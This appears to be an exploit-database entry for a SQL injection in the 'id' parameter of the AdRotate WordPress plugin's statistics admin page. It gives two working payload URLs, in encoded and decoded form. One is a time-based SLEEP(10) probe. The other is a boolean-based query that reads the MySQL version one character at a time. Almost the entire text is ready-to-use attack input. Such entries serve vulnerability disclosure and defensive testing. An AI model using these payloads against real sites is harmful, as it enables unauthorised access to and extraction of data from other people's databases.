Share
## https://sploitus.com/exploit?id=WPEX-ID:AAFAC655-3616-4B27-9D0F-1CBC2FAF0151
Param "id" is vulneable to SQL Injeciton.

Example 1:
http://example.com/wp-admin/admin.php?page=adrotate-statistics&view=group&id=1+AND+SLEEP%2810%29

Clear version: wp-admin/admin.php?page=adrotate-statistics&view=group&id=1 AND SLEEP(10)

This query will delay page load by 10 seconds

Example 2:
by using a boolean-based technique, one can extract info about the system.

http://example.com/wp-admin/admin.php?page=adrotate-statistics&view=group&id=2+AND+1%3D%28SELECT+IF+%28+GREATEST%28+ORD%28MID%28%40%40version%2C+1%2C+1%29%29%2C+1%29+%3D+53%2C+1%2C+0%29%29

Clear version: wp-admin/admin.php?page=adrotate-statistics&view=group&id=2 AND 1=(SELECT IF ( GREATEST( ORD(MID(@@version, 1, 1)), 1) = 53, 1, 0))

This query will check if the first char of MySQL version is "5" or not.